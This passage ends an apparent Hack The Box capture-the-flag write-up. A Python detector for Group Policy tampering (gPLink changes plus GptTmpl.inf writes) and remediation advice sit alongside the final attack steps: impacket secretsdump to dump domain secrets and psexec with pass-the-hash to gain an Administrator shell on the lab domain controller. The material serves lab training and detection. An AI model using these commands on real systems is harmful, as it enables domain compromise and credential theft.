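    {"time": "2025-08-22T08:01:11", "id": 5136, "subject": "FRIZZ\\M.SchoolBus",
     "attribute": "gPLink", "object": "OU=Domain Controllers,DC=frizz,DC=htb"},
    {"time": "2025-08-22T08:03:40", "id": 5145, "subject": "FRIZZ\\M.SchoolBus",
     "share": "\\\\*\\SYSVOL", "access": "WriteData",
     "target": f"frizz.htb\\Policies\\{GPO_GUID}\\Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf"},
    # routine admin work: re-linking an existing GPO without touching SYSVOL
    {"time": "2025-08-22T08:20:00", "id": 5136, "subject": "FRIZZ\\Administrator",
     "attribute": "gPLink", "object": "OU=Staff,DC=frizz,DC=htb"},
]


def classify(ev):
    """Map one event to a step of the chain, or None if it is not part of it."""
    if ev["id"] == 5137 and ev.get("class") == "groupPolicyContainer":
        return "gpo_created"
    if ev["id"] == 5136 and ev.get("attribute", "").lower() == "gplink":
        return "gpo_linked"
    if (ev["id"] == 5145 and "write" in ev.get("access", "").lower()
            and ev.get("target", "").lower().endswith("secedit\\gpttmpl.inf")):
        return "gpttmpl_written"
    return None


def detect_gpo_abuse(events, window=timedelta(minutes=30)):
    """Return {subject: [steps]} for subjects that linked a GPO and wrote
    GptTmpl.inf within `window`; gpo_created is reported when also seen."""
    seen = defaultdict(dict)          # subject -> {step: first time seen}
    for ev in events:
        step = classify(ev)
        if step:
            seen[ev["subject"]].setdefault(step, datetime.fromisoformat(ev["time"]))
    alerts = {}
    for subject, steps in seen.items():
        if {"gpo_linked", "gpttmpl_written"}.issubset(steps):
            if max(steps.values()) - min(steps.values()) <= window:
                alerts[subject] = sorted(steps)
    return alerts


if __name__ == "__main__":
    for subject, steps in detect_gpo_abuse(SAMPLE_EVENTS).items():
        print(f"GPO tampering by {subject}: {' -> '.join(steps)}")
```

The gPLink modification alone is a weak signal because administrators relink GPOs routinely, which is why the Administrator entry in the sample is not flagged; the GptTmpl.inf write is what turns a new, empty GPO into a Restricted Groups change that puts a user into the local Administrators group on every machine the link covers. The underlying fix is to review who holds WriteGPLink (and WriteDACL/GenericWrite on OUs) in BloodHound, exactly the edge the write-up exploited, and remove it from accounts that do not administer Group Policy.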
As this user is now an administrator, we can use its credentials to dump all secrets from the domain using impacket's secretsdump.
secretsdump.py frizz.htb/M.SchoolBus@frizzdc.frizz.htb -k -dc-ip 10.10.11.60
To get the root flag, you can use psexec to get a session on the machine as Administrator.
psexec.py frizz.htb/Administrator@frizzdc.frizz.htb -hashes ':[HASH_REDACTED]' -k
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is D129-C3DA
Directory of C:\Users\Administrator\Desktop
03/11/2025 04:14 PM <DIR> .
03/11/2025 03:37 PM <DIR> ..
02/25/2025 03:06 PM 2,083 cleanup.ps1
08/21/2025 11:27 PM 34 root.txt
2 File(s) 2,117 bytes
2 Dir(s) 1,878,962,176 bytes free
If you find this blog useful, please consider giving respect on Hack The Box.